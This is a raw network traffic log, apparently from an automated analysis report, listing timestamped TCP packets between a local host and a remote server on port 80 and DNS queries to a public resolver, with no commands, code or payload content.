Nov 23, 2020 16:13:04.697181940 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.710448980 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.710516930 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.739042997 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.739059925 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.739118099 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.776860952 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.781012058 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.781029940 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.781069040 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.815465927 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.815551043 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.853169918 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853194952 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853214979 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853230000 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853249073 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853265047 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853264093 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.853281021 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853288889 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.853297949 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853313923 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853328943 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853332996 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.853343964 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853358984 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.853362083 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.853415966 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.856364012 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.894280910 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.894301891 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.894319057 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.894335032 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.894351006 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.894366026 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.894367933 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.894401073 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.932718039 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.932817936 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.935957909 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.935976982 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.936018944 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.973843098 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.977996111 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.978013992 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.978095055 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:04.987102985 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:04.987155914 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.050390959 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050412893 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050429106 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050445080 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050461054 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050477028 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050483942 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.050497055 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050515890 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050523996 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.050534010 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050549984 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050551891 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.050568104 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050585032 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.050616980 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.050657034 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.057735920 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091325045 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091356993 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091370106 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091384888 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091403008 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091417074 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091434002 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091449022 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.091495037 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.091573000 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.092766047 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.092845917 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.133198977 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.171094894 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.171180010 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.175050974 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.175088882 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.175187111 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.209502935 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247387886 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247422934 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247443914 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247466087 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247478008 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.247490883 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247519970 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.247519970 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247545958 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247565031 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247582912 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247600079 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247618914 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247637033 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.247638941 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247664928 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247687101 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247710943 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.247896910 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.247906923 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.254873037 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289093971 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289127111 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289151907 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289172888 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289192915 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.289195061 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289221048 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289243937 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289256096 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.289269924 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.289330006 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.327320099 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.327410936 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.372325897 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.372366905 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.372464895 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.444473982 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444506884 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444523096 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444538116 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444550991 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444566965 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444581032 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444595098 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444608927 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444622040 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444623947 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.444634914 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444648981 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444662094 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444669962 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.444677114 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444679976 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.444691896 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444705009 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444710970 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.444716930 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.444732904 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.444763899 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.447973013 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.448040009 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.485424042 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.485455036 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.485477924 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.485502958 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.485526085 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.485543966 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.485548973 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.485569000 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.485606909 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.524529934 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.524586916 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.569354057 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.569402933 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.569469929 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.604108095 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641525030 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641551971 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641568899 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641586065 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641586065 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.641616106 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.641733885 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641750097 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641767979 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641784906 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641793966 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.641805887 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641825914 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641825914 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.641844034 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641861916 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641865015 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.641880035 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641887903 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.641897917 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641913891 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641930103 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.641966105 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.641978025 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.641993999 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.642020941 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.642033100 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.642036915 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.642069101 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.649337053 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.682403088 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.682426929 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.682439089 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.682456970 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.682476044 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.682481050 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.682495117 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.682529926 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.721455097 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.721530914 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.766290903 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.766321898 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.766335011 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.766346931 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.766407013 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.766433954 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.801316977 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838568926 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838597059 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838614941 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838633060 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838649035 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838665009 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838665962 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.838680029 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838701010 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838727951 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.838809013 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.838810921 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838830948 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838846922 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838867903 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838871956 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.838886976 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838903904 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.838922024 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.838972092 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.838984013 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.839004993 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.839021921 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.839037895 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.839041948 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.839082003 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.846250057 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.846365929 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.879487991 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.879513025 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.879528999 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.879544973 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.879561901 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.879578114 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.879578114 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.879595041 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.879611015 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.879667044 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.879738092 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.918349981 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.963255882 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.963283062 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:05.964396000 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:05.964423895 CET	49752	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:06.242825031 CET	80	49752	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:16.712352037 CET	49753	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:16.972987890 CET	80	49753	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:16.973136902 CET	49753	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:16.973409891 CET	49753	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:16.973515987 CET	49753	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:17.234237909 CET	80	49753	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:17.234282970 CET	80	49753	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:17.903021097 CET	80	49753	47.241.19.44	192.168.2.3
Nov 23, 2020 16:13:17.903362036 CET	49753	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:17.903456926 CET	49753	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:13:18.164062977 CET	80	49753	47.241.19.44	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2020 16:11:18.239257097 CET	64185	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:18.266329050 CET	53	64185	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:19.534543037 CET	65110	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:19.561656952 CET	53	65110	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:21.140863895 CET	58361	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:21.167860031 CET	53	58361	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:22.028590918 CET	63492	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:22.055624962 CET	53	63492	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:22.873733044 CET	60831	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:22.900986910 CET	53	60831	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:25.590636969 CET	60100	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:25.617887020 CET	53	60100	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:27.283762932 CET	53195	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:27.311038971 CET	53	53195	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:28.515692949 CET	50141	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:28.542745113 CET	53	50141	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:29.584074020 CET	53023	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:29.619760990 CET	53	53023	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:30.433933020 CET	49563	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:30.461198092 CET	53	49563	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:42.947653055 CET	51352	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:42.974719048 CET	53	51352	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:44.381891966 CET	59349	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:44.419260979 CET	53	59349	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:46.002073050 CET	57084	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:46.039405107 CET	53	57084	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:47.160159111 CET	58823	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:47.196433067 CET	53	58823	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:51.496860027 CET	57568	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:51.534282923 CET	53	57568	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:52.523591042 CET	50540	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:52.561302900 CET	53	50540	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:56.342694044 CET	54366	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:56.369894981 CET	53	54366	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:57.383196115 CET	53034	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:57.410885096 CET	53	53034	8.8.8.8	192.168.2.3
Nov 23, 2020 16:11:57.958570004 CET	57762	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:11:57.996260881 CET	53	57762	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:03.977828979 CET	55435	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:04.021301985 CET	53	55435	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:04.047835112 CET	50713	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:04.075010061 CET	53	50713	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:05.322674990 CET	56132	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:05.358623028 CET	53	56132	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:08.153762102 CET	58987	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:08.180757999 CET	53	58987	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:15.997142076 CET	56579	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:16.024188042 CET	53	56579	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:17.010096073 CET	56579	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:17.045795918 CET	53	56579	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:17.707395077 CET	60633	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:17.734544992 CET	53	60633	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:18.024171114 CET	56579	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:18.051207066 CET	53	56579	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:18.520987034 CET	61292	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:18.556674004 CET	53	61292	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:18.657094955 CET	63619	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:18.684286118 CET	53	63619	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:20.040338993 CET	56579	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:20.067365885 CET	53	56579	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:24.057754993 CET	56579	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:24.085024118 CET	53	56579	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:26.193912983 CET	64938	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:26.232759953 CET	53	64938	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:52.072391987 CET	61946	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:52.450663090 CET	53	61946	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:53.216067076 CET	64910	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:53.243102074 CET	53	64910	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:54.805691957 CET	52123	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:54.841114998 CET	53	52123	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:55.827374935 CET	56130	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:55.854645967 CET	53	56130	8.8.8.8	192.168.2.3
Nov 23, 2020 16:12:56.405498028 CET	56338	53	192.168.2.3	8.8.8.8
Nov 23, 2020 16:12:56.432591915 CET	53	56338	8.8.8.8	192.168.2.3
